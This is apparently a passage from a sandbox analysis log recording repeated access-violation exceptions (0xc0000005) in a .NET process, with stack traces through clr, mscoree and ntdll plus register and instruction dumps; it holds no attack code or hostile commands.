__exception__ July 24, 2023, 7:35 a.m.	stacktrace: 0x28a73f9 0x28a725a 0x28a7145 0x28a59e3 0x28a4b79 0x80d9ff 0x807855 0x806f0b 0x803c6b 0x8035d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 18 bb 00 01 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x28a803a registers.esp: 3925316 registers.edi: 3925616 registers.eax: 0 registers.ebp: 3925628 registers.edx: 16824572 registers.ebx: 3928580 registers.esi: 46557040 registers.ecx: 0	1
__exception__ July 24, 2023, 7:35 a.m.	stacktrace: 0x28ab970 0x28a79c4 0x28a725a 0x28a7145 0x28a59e3 0x28a4b79 0x80d9ff 0x807855 0x806f0b 0x803c6b 0x8035d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x28ab9b3 registers.esp: 3925604 registers.edi: 3925948 registers.eax: 0 registers.ebp: 3925612 registers.edx: 0 registers.ebx: 3928580 registers.esi: 46557040 registers.ecx: 45520948	1
__exception__ July 24, 2023, 7:35 a.m.	stacktrace: 0x28a73f9 0x28a725a 0x28a7145 0x28a59e3 0x28a4b79 0x80d9ff 0x807855 0x806f0b 0x803c6b 0x8035d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 18 bb 00 01 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x28a803a registers.esp: 3925316 registers.edi: 3925616 registers.eax: 0 registers.ebp: 3925628 registers.edx: 16824572 registers.ebx: 3928580 registers.esi: 45507072 registers.ecx: 0	1
__exception__ July 24, 2023, 7:35 a.m.	stacktrace: 0x28ab970 0x28a79c4 0x28a725a 0x28a7145 0x28a59e3 0x28a4b79 0x80d9ff 0x807855 0x806f0b 0x803c6b 0x8035d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x28ab9b3 registers.esp: 3925604 registers.edi: 3925948 registers.eax: 0 registers.ebp: 3925612 registers.edx: 0 registers.ebx: 3928580 registers.esi: 45507072 registers.ecx: 46880332	1
__exception__ July 24, 2023, 7:35 a.m.	stacktrace: 0x28abee8 0x28abd39 0x28a712d 0x28a5ccc 0x28a4b79 0x80d9ff 0x807855 0x806f0b 0x803c6b 0x8035d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 18 bb 00 01 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x28a803a registers.esp: 3925292 registers.edi: 3925592 registers.eax: 0 registers.ebp: 3925604 registers.edx: 16824572 registers.ebx: 3928580 registers.esi: 45507072 registers.ecx: 0	1
__exception__ July 24, 2023, 7:35 a.m.	stacktrace: 0x28ab970 0x28ac47e 0x28abd39 0x28a712d 0x28a5ccc 0x28a4b79 0x80d9ff 0x807855 0x806f0b 0x803c6b 0x8035d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x28ab9b3 registers.esp: 3925580 registers.edi: 3925972 registers.eax: 0 registers.ebp: 3925588 registers.edx: 0 registers.ebx: 3928580 registers.esi: 45507072 registers.ecx: 48315204	1
__exception__ July 24, 2023, 7:35 a.m.	stacktrace: 0x28abee8 0x28abd39 0x28a7145 0x28a5ccc 0x28a4b79 0x80d9ff 0x807855 0x806f0b 0x803c6b 0x8035d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 18 bb 00 01 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x28a803a registers.esp: 3925292 registers.edi: 3925592 registers.eax: 0 registers.ebp: 3925604 registers.edx: 16824572 registers.ebx: 3928580 registers.esi: 45507072 registers.ecx: 0	1
__exception__ July 24, 2023, 7:35 a.m.	stacktrace: 0x28ab970 0x28ac47e 0x28abd39 0x28a7145 0x28a5ccc 0x28a4b79 0x80d9ff 0x807855 0x806f0b 0x803c6b 0x8035d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x28ab9b3 registers.esp: 3925580 registers.edi: 3925972 registers.eax: 0 registers.ebp: 3925588 registers.edx: 0 registers.ebx: 3928580 registers.esi: 45507072 registers.ecx: 49664892	1
__exception__ July 24, 2023, 7:35 a.m.	stacktrace: 0x28abee8 0x28abd39 0x28a7145 0x28a5ccc 0x28a4b79 0x80d9ff 0x807855 0x806f0b 0x803c6b 0x8035d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 18 bb 00 01 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x28a803a registers.esp: 3925292 registers.edi: 3925592 registers.eax: 0 registers.ebp: 3925604 registers.edx: 16824572 registers.ebx: 3928580 registers.esi: 45507072 registers.ecx: 0	1
__exception__ July 24, 2023, 7:35 a.m.	stacktrace: 0x28ab970 0x28ac47e 0x28abd39 0x28a7145 0x28a5ccc 0x28a4b79 0x80d9ff 0x807855 0x806f0b 0x803c6b 0x8035d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x28ab9b3 registers.esp: 3925580 registers.edi: 3925972 registers.eax: 0 registers.ebp: 3925588 registers.edx: 0 registers.ebx: 3928580 registers.esi: 45507072 registers.ecx: 51014580	1
__exception__ July 24, 2023, 7:35 a.m.	stacktrace: 0x28ac822 0x28ac631 0x28a712d 0x28a5de4 0x28a4b79 0x80d9ff 0x807855 0x806f0b 0x803c6b 0x8035d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 18 bb 00 01 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x28a803a registers.esp: 3925344 registers.edi: 3925644 registers.eax: 0 registers.ebp: 3925656 registers.edx: 16824572 registers.ebx: 3928580 registers.esi: 45507072 registers.ecx: 0	1
__exception__ July 24, 2023, 7:35 a.m.	stacktrace: 0x28ab970 0x28acc8a 0x28ac631 0x28a712d 0x28a5de4 0x28a4b79 0x80d9ff 0x807855 0x806f0b 0x803c6b 0x8035d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x28ab9b3 registers.esp: 3925632 registers.edi: 3925972 registers.eax: 0 registers.ebp: 3925640 registers.edx: 0 registers.ebx: 3928580 registers.esi: 45507072 registers.ecx: 46118716	1
__exception__ July 24, 2023, 7:35 a.m.	stacktrace: 0x28ac822 0x28ac631 0x28a7145 0x28a5de4 0x28a4b79 0x80d9ff 0x807855 0x806f0b 0x803c6b 0x8035d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 18 bb 00 01 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x28a803a registers.esp: 3925344 registers.edi: 3925644 registers.eax: 0 registers.ebp: 3925656 registers.edx: 16824572 registers.ebx: 3928580 registers.esi: 45493708 registers.ecx: 0	1
__exception__ July 24, 2023, 7:35 a.m.	stacktrace: 0x28ab970 0x28acc8a 0x28ac631 0x28a7145 0x28a5de4 0x28a4b79 0x80d9ff 0x807855 0x806f0b 0x803c6b 0x8035d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x28ab9b3 registers.esp: 3925632 registers.edi: 3925972 registers.eax: 0 registers.ebp: 3925640 registers.edx: 0 registers.ebx: 3928580 registers.esi: 45493708 registers.ecx: 47609512	1
__exception__ July 24, 2023, 7:35 a.m.	stacktrace: 0x28ac822 0x28ac631 0x28a7145 0x28a5de4 0x28a4b79 0x80d9ff 0x807855 0x806f0b 0x803c6b 0x8035d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 